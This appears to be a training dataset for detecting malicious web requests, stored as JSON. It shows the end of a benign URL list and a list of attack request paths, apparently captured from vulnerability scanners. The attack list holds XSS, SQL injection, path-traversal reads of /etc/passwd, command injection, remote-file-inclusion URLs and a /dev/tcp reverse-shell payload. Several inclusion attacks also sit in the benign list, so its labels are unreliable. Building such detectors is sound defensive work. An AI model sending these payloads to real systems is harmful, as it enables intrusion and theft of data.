blast_information/\n/177749/\n/dload-archiveoff/\n/javascript/publications.csproj\n/000095041/\n/administrator/menu_operation.php?site_absolute_path=http://192.168.202.118:8080/moclyxlwqyfjnp??\n/futabamagnum/\n/javascript/dirs.dll\n/betablockmodules/imagesmediagallerymodule/imagesmediagallerymodule.php?current_blockmodule_path=http://192.168.202.96:8080/4dckqcc0acprbz?\n/fonctions/template.php?repphp=http://192.168.202.118:8080/zz5thkvtmlgl??\n/javascript/base.save\n/inc/shows.inc.php?cutepath=http://192.168.202.96:8080/txenjrxf3??\n/przyroda/\n/nyhedsbreve/\n/1004359116/\n/decisionpro_4/\n/spamwalllogo2big/\n/tolerate/\n/000123583/\n/27099_thumb/\n/footer20/\n/printer_46810/\n/javascript/saml.tgz\n/20030418/\n/javascript/hourly.csv\n/imagepreunmultiplier/\n/vgrnep/\n/footerleftcol_white/\n/javascript/faq.jsf\n/programmer-jobs/\n/javascript/item.o\n/javascript/ep.php\n/sb116589968303947412/\n/index.php?phpbb_root_path=http://192.168.202.118:8080/2aibfaczmac8?\n/alert-nimda/\n/000113331/\n/nethome.dat\n/installation-services/\n/yrcjzcjjnl/\n/000078106/\n/img_0941/\n/000044436/\n/6163215/\n/zachman2/\n/development_prerequisites/\n/javascript/schedule.ws\n/19991115/\n/javascript/employees.trace\n/_private/\n/93218036/\n/178361/\n/celebrity big brother uk/\n/168775/\n/119196/\n/javascript/body.tar\n/box6_rt/\n/128967/\n/warehouse-r0/\n/djfzmsdl72/\n/activitiesandinterests/\n/flathead1/\n/ibiz usps integrator activex vb edition v1/\n/a1 jummfa audio converter v5/\n/featureddt/\n/pdficon/\n/c161199f/\n/pokermaster/\n/sld011/\n/20041112-5/\n/box_full/\n/javascript/sfish.vbs\n/javascript/poll.asmx\n/activerecord/\n/panasonic_nvgs180/\n/imovietheater134/\n/samueljohnson/\n/gogomini79/\n/ad_hedl/\n/negligent_gifts/\n/apachessl/\n/mother_child/\n/javascript/crons.properties\n/javascript/asp.dump\n/keep_away/\n/javascript/manifest.jsf\n/041031/\n/104938/\n/q95899945\n/splatter/\n/191059/\n/javascript/secured.conf\n/javascript/automation.key\n/hacker-personals/\n/dirtyharrys_crosshair/\n/info_698/\n/134320/\n/jbruneau/\n/mmounteer/\n/javascript/opengts.yml\n/pathwaytogrowthjobs03172005/\n/john_hiatt/\n/200754/\n/download-001005050/\n/spam-abuse/\n/butylarz/\n/aib_corstudy/\n/cms/meetweb/classes/managerresource.class.php?root_path=http://192.168.202.96:8080/4dckqcc0acprbz?\n/whp0012us_hpc/\n/sploitcast_010/\n/javascript/cpadmin.xslt\n/2451740/\n/ashampoo uninstaller 2000 2/\n/javascript/ls.ora\n/usb_keylogger/\n/javascript/link.php3\n/dhcp_rel/\n/aamn-5ej3p4/\n/javascript/rules.rtf\n/004577/\n/canon_mvx350i/\n/javascript/project.db\n/javascript/prv.7z\n/javascript/osc.xslt\n/javascript/signoff.meta\n/pacosporturbanjeans/\n/dnccellphones/\n/phplib/site_conf.php?ordnertiefe=http://192.168.202.118:8080/tzhfyzkbomspvm?\n/040469/\n/profstc/\n/111205/\n/155042/\n/162981/\n/madgamer01/\n/javascript/encode.bat\n/rigiconeditorial2/\n/templates_club/\n/irani02/\n/javascript/07.tpl\n/dl6812/\n/javascript/low.lib\n/journ2/\n/bcci-1/\n/3034511/\n/182065/\n/158818/\n/javascript/labs.key\n/116216/"
  },
  {
    "path": "datasets/learning-datasets/training/bad.txt",
    "content": "/top.php?stuff='uname >q36497765 #\n/h21y8w52.nsf?<script>cross_site_scripting.nasl</script>\n/ca000001.pl?action=showcart&hop=\\\"><script>alert('vulnerable')</script>&path=acatalog/\n/scripts/edit_image.php?dn=1&userfile=/etc/passwd&userfile_name= ;id; \n/javascript/mta.exe\n/examples/jsp/colors/kernel/loadkernel.php?installpath=/etc/passwd\\x00\n/examples/jsp/cal/feedsplitter.php?format=../../../../../../../../../../etc/passwd\\x00&debug=1\n/phpwebfilemgr/index.php?f=../../../../../../../../../etc/passwd\n/cgi-bin/script/cat_for_gen.php?ad=1&ad_direct=../&m_for_racine=</option></select><?phpinfo();?>\n/examples/jsp/cal/search.php?allwords=<br><script>foo</script>&cid=0&title=1&desc=1\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+4d+5a+50+00+02+00+00+00+04+00+0f+00+ff+ff+00+00+b8+00+00+00+00+00+00+00+40++>>esbq\n/examples/jsp/colors/workarea/contentdesigner/ekformsiframe.aspx?id=\"><script>alert('nessus')</script>\n/id;1627282494;fp;2;fpid;1/\n/<img src=\"javascript:alert(cross_site_scripting.nasl);\">.do\n/bmeun223.exe?<meta http-equiv=set-cookie content=\"testhhwu=7044\">\n/htbin/windmail.exe\n/<script>document.cookie=\"testrluj=1420;\"</script>\n/javascript/.passwd.jpg\n/opensiteadmin/scripts/classes/databasemanager.php?path=http://192.168.202.118:8080/ghl9il?\\x00\n/examples/jsp/jsp2/el/search=<script>alert('xss')</script>\n/javascript/signer.exe\n/help.php?q=\"&del\\x0bq26193259&rem\\x0b\n/c'hoario\\xc3\\xb9/\n/main.php?logout=\"&del\\x0cq31768299&rem\\x0c\n/\\xd0\\x97\\xd0\\xb4\\xd0\\xbe\\xd1\\x80\\xd0\\xbe\\xd0\\xb2'\\xd1\\x8f/\n/themes/modern/user_style.php?user_colors[bg_color]=\"</style><script>alert(411136083423)</script>\n/nyjgaorz.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cgi-bin/index.php?op=default&date=200607' union select 1,501184215,1,1,1,1,1,1,1,1--&blogid=1\n/scripts/cfooter.php3\n/en-us/dda2qr7j.fts?<script>cross_site_scripting.nasl</script>\n/?<meta http-equiv=set-cookie content=\"testpokn=7494\">\n/169okeyj.jspa?<meta http-equiv=set-cookie content=\"testxeoi=3573\">\n/j734qobz.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/error/forum.php?do=viewtopic&cat=1&topic=1&page=1?<script>foo</script\n/post.asp?method=topic&forum_id=1&cat_id=1&type=wvs-xss-magic-string-410025568136\n/ows-bin/windmail.exe\n/manager/secure.php?cfgprogdir=/etc/passwd\\x00\n/debug/showproc?proc===<script>alert('vulnerable');</script>\n/<script>document.cookie=\"testnvxc=4301;\"</script>\n/cacti/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1331905098')</script>\n/scripts/comersus_customerregistrationform.asp\n/cgi-bin/search.pl?form=../../../../../../etc/passwd\\x00\n/help.php?q='uname >q23433168 #\n/u8yiqilu.jsp?<meta http-equiv=set-cookie content=\"testswjp=6010\">\n/scripts/forum.php3?id_article=1&id_forum=-1/**/union/**/select 1376526276--\n/core/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/xsqln7eb.aspx?<meta http-equiv=set-cookie content=\"testpcbb=9254\">\n/u8yiqilu.dll?<script>document.cookie=\"testswjp=6010;\"</script>\n/5o9zq43e.cfm?<script>cross_site_scripting.nasl</script>\n/manager/cgi/tseekdir.cgi?location=/etc/passwd\\x00\n/qhvu0pdg.fts?<meta http-equiv=set-cookie content=\"testchuc=2100\">\n/scripts/lsg2.cgi\n/1r8cfrlf.exe?<script>document.cookie=\"testydan=5106;\"</script>\n/scripts/misc/audio.php?recording=../version.inc\n/javascript/.passwd.php3\n/<script>cross_site_scripting.nasl</script>.idc\n/learnvbscript/\n/main.php?logout=\"\\x0duname #\n/recordings/usrdetails.php?sgnuptype=csaleid<script>nessus</script>\n/javascript/emea.exe\n/8t9v8k7x.exe?<script>document.cookie=\"testhvje=9403;\"</script>\n/examples/jsp/error/include/error/autherror.cfm?errorcode=1&ftvar_linkp=\"></a><script>alert('fusetalk_mult_xss.nasl')</script><a href=\"\n/en-us/oie504mr.jspa?<meta http-equiv=set-cookie content=\"testtpby=7052\">\n/examples/jsp/colors/bb-hostsvc.sh?hostsvc=../../../../../etc/passwd\n/cgi-bin/type.asp?itype='duware_itype_sql_injection.nasl\n/help.php?q=\"del q66737251 #\n/dslpwt15.fts?<script>document.cookie=\"testtkio=5454;\"</script>\n/lsoix5h3.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/chef's_knives/\n/starnet/addons/slideshow_full.php?album_name='288150554\n/examples/jsp/num/index.php?id='union/**/select/**/0,0,1369222205,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--\n/scripts/search.scr.php?globals[pth][classes]=http://192.168.202.118:8080/tzhfyzkbomspvm??\n/mpcgi/apexec.pl?etype=odp&passurl=/category/&template=../../../../../../../../../../etc/passwd\\x00.html\n/main.php?logout=\"rm q61955456&rem \n/scripts/w04ukbv54ixz.cfm\n/postscriptbarcode/\n/javascript/htpasswd.exe\n/javascript/mod.exe\n/containsscript/\n/help.php?q=;del q94314237 #\n/scripts/alienform.cgi?_browser_out=.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./etc/passwd\n/tera patrick - farmer's daughter/\n/cgi-sys/a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd\n/bxnyrhmh.cgi?<script>document.cookie=\"testmjct=1867;\"</script>\n/scripting languages/\n/cgi-local/a1disp3.cgi?../../../../../../../../../../etc/passwd\n/bxnyrhmh.cfc?<script>document.cookie=\"testmjct=1867;\"</script>\n/javascript/warez.exe\n/scs86g1p.cfm?<meta http-equiv=set-cookie content=\"testquyx=2820\">\n/scripts/search.scr.php?globals[pth][classes]=http://192.168.202.96:8080/4dckqcc0acprbz??\n/tuwjta1w.x?<script>document.cookie=\"testpokn=7494;\"</script>\n/pirvate/ltwpdfmonth.php?ltw_config['include_dir]=http://192.168.202.118:8080/ghl9il?\n/cacti/javascript.php?abs_path=/etc/passwd\\x00\n/en-us/n9xlumt5.x?<script>cross_site_scripting.nasl</script>\n/bb-hist.sh?histfile=../../../../../etc/passwd\n/cgi-bin/view_user.php?list=1&letter=&sort_by='select\n/<script>document.cookie=\"testggad=2000;\"</script>\n/scripts/readme.txt\n/ybz5rz7a.pl?<script>document.cookie=\"testsbvw=6289;\"</script>\n/javascript/backup.exe\n/javascript/htpasswd.cgi\n/phpmyadmin/documentation.html?phpmyadmin=csc3t31gos8q2h30o9cfk567d1lu5go1;/bin/id\n/rv98iwjp.php?<script>cross_site_scripting.nasl</script>\n/scripts/forum.php?do=viewtopic&cat=1&topic=1&page=1?<script>foo</script\n/cgi-bin/starnet/addons/slideshow_full.php?album_name='401935065\n/y8pmygrp.exe?<script>cross_site_scripting.nasl</script>\n/top.php?stuff=';uname >q64815511 #\n/xfkun1ku.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/checkbox/bandwidth/index.cgi?action=showmonth&year=<script>foo</script>&month=<script>foo</script>\n/oie504mr.cfc?<meta http-equiv=set-cookie content=\"testtpby=7052\">\n/opensiteadmin/scripts/classes/filter.php?path=http://192.168.202.96:8080/swgnhpydbq0t?\\x00\n/manager/index.php?selskin=../inc/boxleft.inc\\x00&xposbox[l][]=/etc/passwd\\x00\n/iktok2bw.cfm?<script>cross_site_scripting.nasl</script>\n/help.php?q=del;q81588837&rem;\n/en-us/dda2qr7j.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/~eric.exe\n/scripts/apps/pbcs.dll/misc?url=../../../../../../../../../../../../boot.ini\n/cgi-914/webbbs/webbbs_config.pl?body=aaaaffff&email=test@example.com&followup=10;cat /etc/passwd&name=joe\n/manager/loudblog/inc/parse_old.php?template=@system(id);@&php_use=1&phpseparator=@\n/acart2_0/signin.asp?msg=<script>alert(\\\"test\\\")</script>\n/cgi-bin/inc/formmail.inc.php?script_root=../templates/mail.tpl.txt\\x00\n/read.php?pagenum_rsread=1&totalrows_rsread=<script>alert('wvs-xss-magic-string-414685599129')</script>\n/help.php?q='rm\\x09q87915929\\x09#\n/recordings/calendar.php?serverpath=/etc/passwd\\x00\n/javascript/hardcore.exe\n/examples/servlets/servlet/ovlaunch.exe\n/d765w06j.cfm?<script>cross_site_scripting.nasl</script>\n/javascript/scripts.exe\n/i686v90l.cgi?<script>document.cookie=\"testfutf=1550;\"</script>\n/ywaxntrx.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/phpmyadmin/doc/index.php?s=/etc/passwd\\x00\n/scriptssearch_results.dot?search_query=nessus\"><script>alert('dotcms_search_query_xss.nasl')</script>/\n/scripts/neomail-prefs.pl?sessionid=nessus-session-0.neomail_sessionid_validation.nasl&action=addfolder&foldername=mbt7mplpoxxxq5dko\n/javascript/program files.exe\n/manager/xaradodb/server.php?sql='adodb_sql_sql_injection.nasl\n/syshelp/cscript/showfunc.stm?func=<script>alert(document.cookie)</script>\n/l4fz1dqw.nsf?<script>cross_site_scripting.nasl</script>\n/if69ddo1.php3?<meta http-equiv=set-cookie content=\"testiabz=5220\">\n/main.php?stuff=\"&ping\\xa0-w\\xa07000\\xa0-n\\xa01\\xa01.2.3.4&rem\\xa0\n/top.php?stuff=;sleep 7 #\n/?<script>document.cookie=\"testqppc=8767;\"</script>\n/scripts/index.php?op=viewarticle&articleid=9999/**/union/**/select/**/1331905182,1,1,1,1,1,1,1--&blogid=1\n/scripts/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 2020390524,2,880987929,4,5,6,7,8,9,0,1,2,3 --\n/main.php?logout=ver,>q12148819&rem,\n/ny1b3qq4.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?stuff='&sleep\\x0910\\x09#\n/scripts/eezuu7xc7ge3.php3\n/ovcgi/webappmon.exe?ins=nowait&sel=localhost&act=ping\n/7uz3ok60.htm?<script>cross_site_scripting.nasl</script>\n/top.php?stuff=\"sleep\\x099\\x09#\n/scripts/index.php?board=nonexistant1465558133\n/d44uk9h2.exe?<script>document.cookie=\"testmybc=2088;\"</script>\n/index.php?include_files[]=&include_files[query_string]=/etc/passwd\n/awstatstotals.php?sort={${phpinfo()}}{${exit()}}\n/help.php?q=ping;-w;11000;-n;1;1.2.3.4|rem;\n/tukodz3j.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/forum.php3?id_article=1&id_forum=-1/**/union/**/select 1164366855--\n/ht8pn8uq.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/yver8r9o.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cgi-bin/starnet/addons/slideshow_full.php?album_name='1273136253\n/examples/jsp/checkbox/login.php?user=\"><script>alert('pubcookie_xss.nasl');</script>\n/qhvu0pdg.dll?<meta http-equiv=set-cookie content=\"testchuc=2100\">\n/javascript/webbbs.exe\n/<meta http-equiv=set-cookie content=\"testjvvf=7721\">\n/boilerplate.asp?nfuse_template=.../.../.../.../.../.../.../.../.../boot.ini&nfuse_currentfolder=/\n/scripts/vhost.php?action=logout&time=1331919067\n/examples/jsp/cal/dcforum.cgi?az=list&forum=../../../../../../../etc/passwd\\x00\n/bzuf9ozq.pl?<script>cross_site_scripting.nasl</script>\n/cgi-bin/directorypro.cgi?want=showcat&show=../../../../../../../../../../etc/passwd\\x00\n/interface/login/login_frame.php?site=<script>alert(owasp zap);</script> and 1=1\n/cgi-bin/error.php?selected_theme=<script>alert(uebimiau_selected_theme_xss.nasl)</script>\n/scripts/default.asp\n/examples/jsp/num/contenido/classes/class.inuse.php?cfg[path][contenido]=/etc/passwd\\x00\n/oie504mr.htm?<script>document.cookie=\"testtpby=7052;\"</script>\n/examples/jsp/jsp2/jspx/activatemember?activatecode=&member=\"><script>alert('mvnforum_activatemember_xss.nasl')</script>\n/en-us/account/workarea/contentdesigner/ekformsiframe.aspx?id=\"><script>alert('nessus')</script>\n/subscriptionservices/\n/scripts/index.php?getapplication=register&checknum=1&args=null\n/vjbrrppi.fts?<script>cross_site_scripting.nasl</script>\n/cacti/download.php?language=/etc/passwd\\x00\n/phpmyadmin/k/home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor\n/phpmyadmin/view_user.php?list=1&letter=&sort_by='select\n/javascript/debug.exe\n/scripts/udblphlq4nln.sh\n/chief's message on violence against women/\n/cacti/js/vendors.php?file=../../../../../../../../../../etc/passwd\\x00nessus.js\n/scripts/qg9h0c0svvat.shtml\n/examples/jsp/jsp2/jspx/view_user.php?list=1&letter=&sort_by='select\n/cgi-bin/perl.exe?-v\n/projects/1/repository/annotate?rev=`0<&186-;exec 186<>/dev/tcp/192.168.202.118/17246;sh <&186 >&186 2>&186`\n/ka'roo/\n<script>document.cookie=\"testrluj=1420;\"</script>\n/javascript/maestro.exe\n/top.php?stuff='&sleep 9 #\n/cacti/setcookie.php?u=../../../../../../../../../../../../etc/passwd\\x00&plugin=pblang_mult_flaws.nasl\n/javascript/vendors.exe\n/scripts/tree.php\n/subscriptions.yml\n/scripts/4rzefq7dsowk.pl\n/help.php?q=\"\\x0auname\\x09>q72938489\\x09#\n/pwcgi/smpwservicescgi.exe?target=http://www.nessus.org\n/javascript/bfc.exe\n/cgi-bin/rss.php?blogid=1&profile=../../config/config.properties.php\\x00\n/cacti/include/doc/get_image.php?lang=en&img=../../../../../../../../../../etc/passwd\n/snmx-cgi/fxm.exe\n/descriptious/\n/main.php?stuff=\"ping\\x0b-w\\x0b11000\\x0b-n\\x0b1\\x0b4.3.2.1&rem\\x0b\n/manager/lang/index.php?file=/etc/passwd\n/cgi-bin/generate.cgi?content=../../../../../../../../../../windows/win.ini\\x00board=board_1\n/o35zot2r.cfm?<script>cross_site_scripting.nasl</script>\n/scripts/inc/pipe.php?hcl_path=http://xxxxxx./\n/prescription-ultram/\n/t7tm4m0b.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/phpmyadmin/index.php?op=default&date=200607' union select 1,1265182078,1,1,1,1,1,1,1,1--&blogid=1\n/en-us/33y9gcqq.jspa?<meta http-equiv=set-cookie content=\"testnvxc=4301\">\n/ao22ww7y.cfm?<script>document.cookie=\"testqppc=8767;\"</script>\n/top.php?stuff=&ver\\x0b>q21316317&rem\\x0b\n/6dlc2zm9.asp?<script>document.cookie=\"testqpux=4016;\"</script>\n/scripts_help/\n/feedsplitter.php?format=../../../../../../../../../../etc/passwd\\x00&debug=1\n/iajtej82.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?logout=\"|ping\\x0c-w\\x0c8000\\x0c-n\\x0c1\\x0c1.2.3.4|rem\\x0c\n/javascript/.passwd.db\n/rpxyx07v.do?<meta http-equiv=set-cookie content=\"testbnli=1975\">\n/o35zot2r.exe?<script>cross_site_scripting.nasl</script>\n/scriptsfaq.php?skin=../../admin/manager&tplpath=admin\n/ygkjkngd.cfc?<script>document.cookie=\"testnago=4518;\"</script>\n/unix-scripts/\n/d44uk9h2.exe?<meta http-equiv=set-cookie content=\"testmybc=2088\">\n/top.php?stuff=&rm;q25243259&rem;\n/<meta http-equiv=set-cookie content=\"testqppc=8767\">\n/cgi-bin/sawmill6cl.exe?ho+{complete_version}\n/scriptaculous/\n/t7tm4m0b.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/recorder.exe\n/scripts/contenido/classes/class.inuse.php?cfg[path][contenido]=/etc/passwd\\x00\n/scripts/rx9ysf2iwv4j.cfm\n/cgi-bin/index.php?gadget=glossary&action=viewterm&term=<script>alert('jaws_xss.nasl');</script>\n/scs86g1p.aspx?<meta http-equiv=set-cookie content=\"testquyx=2820\">\n/bxnyrhmh.dll?<meta http-equiv=set-cookie content=\"testmjct=1867\">\n/examples/jsp/colors/index.php?show=../../../../../../../../../../../etc/passwd\\x00\n/zuihld5m.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/l13b77e5.nsf?<script>document.cookie=\"testjvvf=7721;\"</script>\n/xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('chmod+777+/tmp/cgeqvnsxdv.sh'); function v\n/cgi-binsearch-results.dot?search_query=nessus\"><script>alert('dotcms_search_query_xss.nasl')</script>/\n/top.php?stuff=';uname >q38627655 #\n/examples/jsp/sessions/edit_image.php?dn=1&userfile=/etc/passwd&userfile_name= ;id; \n/top.php?stuff=\"&rm\\x0cq55426988&rem\\x0c\n/javascript/traces.exe\n/0qhcnefz.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/xampp/phonebook.php?lastname=',acunetix())/*&firstname=1\n/iv5vkgam.php?<meta http-equiv=set-cookie content=\"testfosd=94\">\n/igtf0zon.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/en-us/oie504mr.dll?<meta http-equiv=set-cookie content=\"testtpby=7052\">\n/bzuf9ozq.kspx?<script>cross_site_scripting.nasl</script>\n/recordings/module.php?module=osticket&file=../../../../../../../../../../../etc/passwd\n/help.php?q=\"&ver&rem \n/169okeyj.html?<meta http-equiv=set-cookie content=\"testxeoi=3573\">\n/openautoclassifieds/friendmail.php?listing=<script>alert(document.domain);</script>\n/administrator/gallery/navigation.php?directory=\\\"<script>alert(document.cookie)</script>\n/en-us/h5sc3gxy.nsf?<script>cross_site_scripting.nasl</script>\n/cacti/atomicboard/index.php?location=../../../../../../../../../../../../../../../etc/passwd\n/en-us/dda2qr7j.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/num/pfdispaly.cgi?../../../../../../etc/passwd\n/smpwservicescgi.exe\n/javascript/feeds.exe\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\";ls+-l;rm+/tmp/pcousamoyu\"\n/cgi-bin/traffic.cgi?cfg=../../../../../../../../etc/passwd\n/i7prbs22.cgi?<meta http-equiv=set-cookie content=\"testjnre=7328\">\n/b5xdqgz2.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/checkbox/admin/admin.php?sid='\n/nmw0do67.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/_xuzlr7swn95.php3\n/ghswfouu.cfc?<script>document.cookie=\"testsqmm=5713;\"</script>\n/cgi-binsearch_results.dot?search_query=nessus\"><script>alert('dotcms_search_query_xss.nasl')</script>/\n/examples/jsp/checkbox/rot13sj.cgi?/etc/passwd\n/scripts/gwweb.exe?help=bad-request\n/cgi/query?mss=../config\n/t7tm4m0b.nsf?<script>cross_site_scripting.nasl</script>\n/superduperdescription/\n/manager/library/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/javascript/bank.exe\n/3hlysl2x.cfc?<script>document.cookie=\"testgjbe=8505;\"</script>\n/iktok2bw.cfc?<script>cross_site_scripting.nasl</script>\n/cacti/cgiforum.pl?thesection=../../../../../../../../etc/passwd\\x00\n/htbin/a1disp3.cgi?../../../../../../../../../../etc/passwd\n/examples/jsp/sessions/help.php?section='qualiteam_xcart_sql_xss.nasl\n/606wkcop.php?<script>cross_site_scripting.nasl</script>\n/examples/servlets/servlet/admin/admin.php?sid=0'\n/cgi-bin/index.php?src=1&_common=1&time=1331919011&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd\\x00\n/include/default_header.php?script_path=http://192.168.202.118:8080/tzhfyzkbomspvm?\n/server.pt?open=space&name=\";}</script><script>alert('plumtree_name_xss.nasl')</script>\n/7u1pb2xi.html?<meta http-equiv=set-cookie content=\"testlwwz=718\">\n/examples/servlets/servlet/home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor\n/javascript/foo.exe\n/scripts/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1331904208')</script>\n/fcgi-bin/fileseek.cgi?foot=&head=;cat /etc/passwd|\n/eg2u8pbv.htm?<script>cross_site_scripting.nasl</script>\n/help.php?q=\"&del\\x0cq93118475&rem\\x0c\n/xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('chmod+555+/tmp/zffcwqffhn0;'); function v\n/javascript/loading.exe\n/scripts/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331908785&lang_crm=../../vtigerservice.php\\x00\n/cgi-bin/www/delivery/ac.php?bannerid=-1331904183+or+1=1+--+';passthru(base64_decode($_server[http_nessus_0oywsnwb]));die;/*\n/cwmail.exe\n/main.php?stuff=;del q92696358 #\n/scripts/ws_ftp.ini\n/x2gyorli.do?<script>document.cookie=\"testwhac=3130;\"</script>\n/9o6g5vkn.cfc?<script>cross_site_scripting.nasl</script>\n/templates/admin/login_form.php?msg_login=<script>alert(\"force_xss\")</script>\n/scripts/sendcard.php?view=1&id='sendcard_sql.nasl\n/msadm/domain/index.php3?account_name=\\\"><script>alert('vulnerable')</script>\n/examples/jsp/cal/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904365&lang_crm=../../../../../../../../../../../..//etc/passwd\\x00\n/jw64yq8u.aspx?<meta http-equiv=set-cookie content=\"testylfu=1313\">\n/zv8tv7h8.php3?<meta http-equiv=set-cookie content=\"testcqwz=9752\">\n/javascript/.htaccess///skipfish.invalid/;?\n/index.php?_language=../../../../../../../../../../etc/passwd\\x00\n/m4kkjf8l.dll?<meta http-equiv=set-cookie content=\"testyglc=8988\">\n/main.php?logout=;rm\\x09q14218261\\x09#\n/scripts/?cmd=config\n/cacti/simple/view_page?mv_arg=|cat /etc/passwd|\n../../../../../../../../../../etc/passw*\n/cgi-bin/logbook.pl?file=../../../../../../../../../../bin/cat /etc/passwd\\x00|\n/en-us/account/whois.cgi?action=load&whois=;id\n/cgi-bin/a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd\n/scripts/index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1332009305',null,null,null,null --\nfi?/etc/passwd\n/top.php?stuff=1 '\" -- \n/en-us/<script>cross_site_scripting.nasl</script>.php\n/ca/..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\/\\\\etc/\\\\passwd\n/opensiteadmin/scripts/classes/formmanager.php?path=http://192.168.202.118:8080/zz5thkvtmlgl?\\x00\n/cgi-bin/index.php?id=_pb9wansu9'\n/cgi-bin/dataservice.asmx/authuser?username='nessus1331919210&password=nasl&needcompress=0\n/sys/code/box.inc.php?config[\"sipssys\"]=http://192.168.202.118:8080/moclyxlwqyfjnp?\n/recordings/lib/owl_api.php?xrms_file_root=../../../../../../../../../../../../etc/passwd\\x00\n/main.php?logout='&uname >q16695623 #\n/adodb-perf-module.inc.php?last_module=zzz_adoconnection{}system(id);class zzz_adoconnection{}//\n/javascript/.passwd.py\n/cgi-bin/webappmon.exe?ins=nowait&act=natping&sel=\"255.255.255.255 & id&\"\n/help.php?q=\\x0auname\\x09>q27637243\\x09#\n/javascript/mark.exe\n/bxnyrhmh.php?<script>document.cookie=\"testmjct=1867;\"</script>\n/news.php?scriptpath=http://192.168.202.118:8080/2aibfaczmac8??\n/examples/jsp/checkbox/faxsurvey?cat /etc/passwd\n/0z575z74.do?<meta http-equiv=set-cookie content=\"testuhsv=9753\">\n/s7qus4g3.x?<script>cross_site_scripting.nasl</script>\n/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/etc/passwd\\x00\n/main.php?logout=\"rm;q97754931&rem;\n/qb2xy9aw.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/ihd231-xss/\n/examples/jsp/colors/detail.asp?nchannel='1\n/ddoworrl.cfc?<script>document.cookie=\"testvlau=8517;\"</script>\n/en-us/s7qus4g3.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/hrttz9fj.php3?<meta http-equiv=set-cookie content=\"testtbjy=7334\">\n/javascript/developers.exe\n/javascript/bio.exe\n/phpmyadmin/af.cgi?_browser_out=.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./etc/passwd\n/b5xdqgz2.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/phpmyadmin/documentation.html?phpmyadmin=\"><img src=1 onerror=javascript:alert(205)>\n/nuh3zirz.kspx?<script>cross_site_scripting.nasl</script>\n/n9xlumt5.pl?<script>cross_site_scripting.nasl</script>\n/fmnveedu.htm?<script>document.cookie=\"testgfbr=7014;\"</script>\n/daddy's little princess - scene 2/\n//<body><script src=http://www.example.com/test?rnd=q91324775></script>\n/scripts/mundimail/template/simpledefault/admin/_masterlayout.php?top=http://cirt.net/rfiinc.txt?\n/jdx255ea.fts?<meta http-equiv=set-cookie content=\"testziyq=5055\">\n/examples/servlets/servlet/_head.php?_zb_path=../../../../../../../../../../etc/passwd\\x00\n/examples/jsp/error/wordtrans.php?command=show_desc&advanced=1\";id; true \"\n/scripts/bpk_bsfe_4vq.html\n/scripts/cmslogin.aspx\n/cgi-915/sensepost.exe?/c+dir\n/cgi-local/fileseek.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd\n/opensiteadmin/scripts/classes/fieldmanager.php?path=http://192.168.202.96:8080/swgnhpydbq0t?\\x00\n/<script>cross_site_scripting.nasl</script>.exe\n/javascript/purchasing.exe\n/piranha/secure/passwd.php3\n/help.php?q=ver\\x09>q72339979&rem\\x09\n/main.php?stuff=\"\\x0auname #\n/ap58k3ci.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/dda2qr7j.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331908736,1948616015 -- \n/ygkjkngd.cgi?<meta http-equiv=set-cookie content=\"testnago=4518\">\n/examples/jsp/colors/search.cgi?..\\..\\..\\..\\..\\..\\winnt\\win.ini\n/top.php?stuff=\"\\x0arm\\x09q52122221\\x09#\n/um7xpn15.fts?<meta http-equiv=set-cookie content=\"testotoy=6142\">\n/en-us/fo564rei.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/admin/news.admin.php?path_to_script=http://192.168.202.96:8080/whmch8ftkt7kv??&cmd=ls\n/javascript/to.exe\n/m4kkjf8l.exe?<meta 